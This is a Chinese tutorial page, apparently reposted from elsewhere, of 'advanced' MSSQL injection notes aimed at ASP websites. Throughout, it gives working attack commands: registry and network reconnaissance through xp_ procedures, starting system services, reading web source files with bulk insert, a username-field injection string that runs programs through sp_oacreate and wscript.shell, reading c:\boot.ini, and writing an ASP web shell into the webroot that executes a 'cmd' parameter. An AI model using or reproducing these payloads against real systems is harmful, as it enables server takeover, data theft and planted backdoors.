当前位置: 网学 > 编程文档 > ASP > 正文

Mssql高级注入笔记II

来源:Http://myeducs.cn 联系QQ:点击这里给我发消息 作者: 用户投稿 来源: 网络 发布时间: 13/06/17

鉴于大家对asp十分关注,我们编辑小组在此为大家搜集整理了“Mssql高级注入笔记II”一文,供大家参考学习

一些sql扩展
xp_regaddmultistring
xp_regdeletekey 删除键名
xp_regdeletevalue 删除键值
xp_regenumkeys 枚举
xp_regenumvalues
xp_regread 对于
xp_regremovemultistring
xp_regwrite 写
xp_availablemedia 查看驱动器
xp_dirtree 看目录
xp_enumdsn ODBC数据源
xp_loginconfig 一些服务器安全配置的信息
xp_makecab 打包,某些dbo权限先可做大用
xp_ntsec_enumdomains 枚举域名相关信息
xp_terminate_process 终端进程和ip啦
xp_logininfo 当前登录帐号
sp_configure 检索数据库中的内容(我觉得这个挺有用的)
sp_helpextendedproc 得到所有的存储扩展
sp_who2 查询用户,他们登录的主机,他们在数据库中执行的操作等等

一些网络信息
exec xp_regread HKEY_LOCAL_MACHINE,
''SYSTEM\CurrentControlSet\Services\lanmanserver\parameters'',
''nullsessionshares''
SNMP辅助网络踩点
exec xp_regenumvalues HKEY_LOCAL_MACHINE,
''SYSTEM\CurrentControlSet\Services\snmp\parameters\validcomm
unities''

开始一些系统服务,比如telnet,前提希望可以跑来admin或者一些系统密码
exec master..xp_servicecontrol ''start'', ''schedule''
exec master..xp_servicecontrol ''start'', ''server''

Sp_addextendedproc ''xp_webserver'',''c:\temp\xp_foo.dll'' 此扩展可以运行程序

使用''bulk insert''语法可以将一个文本文件插入到一个临时表中。简单地创建这个表:
create table foo( line varchar(8000) )
然后执行bulk insert操作把文件中的数据插入到表中,如:
bulk insert foo from ''c:\inetpub\wwwroot\admin\inc.asp''

bcp "select * from text..foo" queryout c:\inetpub\wwwroot\runcommand.asp –c -Slocalhost –Usa –Pfoobar
''S''参数为执行查询的服务器,''U''参数为用户名,''P''参数为密码,这里为''foobar''

SQL SERVER中提供了几个内置的允许创建ActiveX自动执行脚本的存储过程。这些脚本和运行在windows脚本解释器下的脚本,或者ASP脚本程序一样——他们使用VBScript或JavaScript书写,他们创建自动执行对象并和它们交互。一个自动执行脚本使用这种方法书写可以在Transact-SQL中做任何在ASP脚本中,或者WSH脚本中可以做的任何事情
使用''wscript.shell''对象建立了一个记事本的实例:
declare @o int
exec sp_oacreate ''wscript.shell'',@o out
exec sp_oamethod @o,''run'',NULL,''notepad.exe''
指定在用户名后面来执行它:
Username:''; declare @o int exec sp_oacreate ''wscript.shell'',@o out exec sp_oamethod @o,''run'',NULL,''notepad.exe''—

使用FSO读一个已知的文本文件:
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate ''scripting.filesystemobject'', @o out
exec sp_oamethod @o, ''opentextfile'', @f out, ''c:\boot.ini'', 1
exec @ret = sp_oamethod @f, ''readline'', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, ''readline'', @line out
end

创建了一个能执行通过提交的命令,默认是asp那组权限的用户下运行,前提是sp_oacreate扩展存在
declare @o int, @f int, @t int, @ret int
exec sp_oacreate ''scripting.filesystemobject'', @o out
exec sp_oamethod @o, ''createtextfile'', @f out,
''c:\inetpub\wwwroot\foo.asp'', 1
exec @ret = sp_oamethod @f, ''writeline'', NULL,
''<% set o = server.createobject("wscript.shell"): o.run(
request.querystring("cmd") ) %>''

sp_who ''1'' select * from syso
  • 上一篇资讯: XSS测试语句大全
  • 网学推荐

    免费论文

    原创论文

    浏览:
    设为首页 | 加入收藏 | 论文首页 | 论文专题 | 设计下载 | 网学软件 | 论文模板 | 论文资源 | 程序设计 | 关于网学 | 站内搜索 | 网学留言 | 友情链接 | 资料中心
    版权所有 QQ:3710167 邮箱:3710167@qq.com 网学网 [Myeducs.cn] 您电脑的分辨率是 像素
    Copyright 2008-2015 myeducs.Cn www.myeducs.Cn All Rights Reserved
    湘ICP备09003080号